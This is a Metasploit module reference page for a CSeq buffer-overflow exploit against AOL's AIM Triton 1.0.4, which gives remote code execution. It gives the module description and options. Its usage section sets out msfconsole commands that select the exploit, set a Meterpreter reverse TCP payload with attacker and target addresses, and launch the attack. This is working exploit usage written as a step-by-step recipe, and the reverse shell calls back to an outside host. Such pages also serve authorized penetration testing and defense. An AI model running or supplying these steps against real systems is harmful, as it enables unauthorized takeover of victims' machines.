AIM Triton 1.0.4 CSeq Buffer Overflow

This module exploits a buffer overflow in AOL\'s AIM Triton 1.0.4. By sending an overly long CSeq value, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.

Search Other Modules

Exploit Rank

Great

Exploit Authors

MC < mc [at] metasploit.com >

Vulnerability References

Exploit Targets

0 - AIM Triton 1.0.4 Universal (default)

Exploit Development

Similar Exploit Modules

Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/sip/aim_triton_cseq
msf exploit(aim_triton_cseq) > show payloads
msf exploit(aim_triton_cseq) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(aim_triton_cseq) > set LHOST [MY IP ADDRESS]
msf exploit(aim_triton_cseq) > set RHOST [TARGET IP]
msf exploit(aim_triton_cseq) > exploit

Exploit Module Options

RHOST	The target address
RPORT	The target port (default: 5061)
CHOST	The local client address
CPORT	The local client port
ContextInformationFile	The information file that contains context information
DisablePayloadHandler	Disable the handler code for the selected payload
DynamicSehRecord	Generate a dynamic SEH record (more stealthy)
EnableContextEncoding	Use transient context when encoding payloads
VERBOSE	Enable detailed status messages
WORKSPACE	Specify the workspace for this module
WfsDelay	Additional delay when waiting for a session